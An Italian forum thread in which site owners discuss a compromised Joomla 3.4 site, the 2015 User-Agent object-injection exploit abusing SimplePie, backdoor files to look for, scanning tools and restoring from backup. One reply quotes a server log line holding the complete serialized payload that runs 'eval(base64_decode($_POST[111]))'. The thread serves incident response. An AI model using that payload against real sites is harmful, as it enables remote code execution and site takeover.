Vulnerabilità nell'estensione SimplePie

[Riverbit]

Buongiorno a tutti! Sono nuovo nel forum.
Ho un sito bloccato dal mio provider di hosting, dove abbiamo scoperto una vulnerabilità su un componente non aggiornato SimplePie.
Il sito è su piattaforma Joomla 3.4.0 e la versione dell'estensione SimplePie è del 2004. Essendo un componente protetto, dal pannello di gestione delle estensioni, non riesco ne a disabilitarlo, disinstallarlo o aggiornarlo.


Avete qualche consiglio?
Grazie mille in anticipo!

[alexred]

Ciao Riverbit,
avete segnalato la vulnerabilità al team di Joomla.org  ?

[$Red]

Ciao, forse mi sbaglio, anzi quasi sicuramente  ma potrebbe essere una delle vulnerabilità corrette con l'aggiornamento 3.4.6 (?)

Edit: infatti ho sbagliato nel pacchetto di update 3.4.5 -> 3.4.6 non c'è traccia di simplepie

[rezor]

Non sbagliavi, SimplePie viene sfruttato nell'attacco, ecco una stringa di esempio presa dal mio server:

Codice: [Seleziona]

/var/log/virtualmin/example.net_access_log:78.36.185.41 - - [14/Dec/2015:19:12:50 +0000] "GET /somepath HTTP/1.1" 301 237 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"sembra che si usi SimplePie. Ma in realtà l'attacco cerca di acchiappare libraries/simplepie/simplepie.lib.php, che non fa affatto parte di Joomla! ma è stato messo là da qualche attacco precedente.
Il file simplepie.lib.php puoi cancellarlo senza tema; tuttavia considera che il tuo sistema è stato compromesso, probabilmente ci saranno altre backdoor, dagli una pulita.

[$Red]

Grazie rezor, in effetti l'ho scritto perche ho googlato un pò ed ho trovato un articolo che citava proprio simplepie, quindi con l'aggiornamento 3.4.6/7 stiamo tranquilli (?) almeno per questo

[rezor]

Stiamo tranquilli che non possono più usare questo exploit; ma se già hanno caricato una backdoor (cerca

• libraries/joomla/exporter.php
• libraries/simplepie/simplepie.lib.php

ma ce ne saranno altri) , io sto mettendo un po' di funzionalità nel componente Little Helper per aiutare la diagnosi, certo è codice che lascia molto a desiderare ma è un inizio, include alcune regole del JAMSS e altre che ho scritto per il JedChecker, altrimenti maldet, rkhunter, clamav, il caro buon vecchio grep... senza contare che poi ti devi anche andare a guardare il db.

[MariaElenaBoschi]

guarda che simplepie è usato in joomla e sta nelle librerie legacy.

Per portare a termine l'esploit servivano dei vettori e simplepie faceva parte di questi

quì è spiegato benissimo come condurre l'attacco e anche perchè è stato fatto così
https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/

[Riverbit]

Quindi qual'è la maniera più rapida per risolvere la questione?
Se ho un backup datato posso ripristinare quello e aggiorno la ver di joomla all'utlima? Può funzionare?

[rezor]

Si, ottima la strategia del backup; fai comunque una copia del sito attuale se hai dati di produzione che sono cambiati. Cancella completamente i files Joomla, e ripristina il backup; poi cancelli la cache e sei pronto ad andare; occhio che potresti ancora avere dei danni nel database; ma per quanto riguarda il filesystem, se cancelli e ripristini sei a posto

[Riverbit]

Gentilissimi! ora provo col ripristino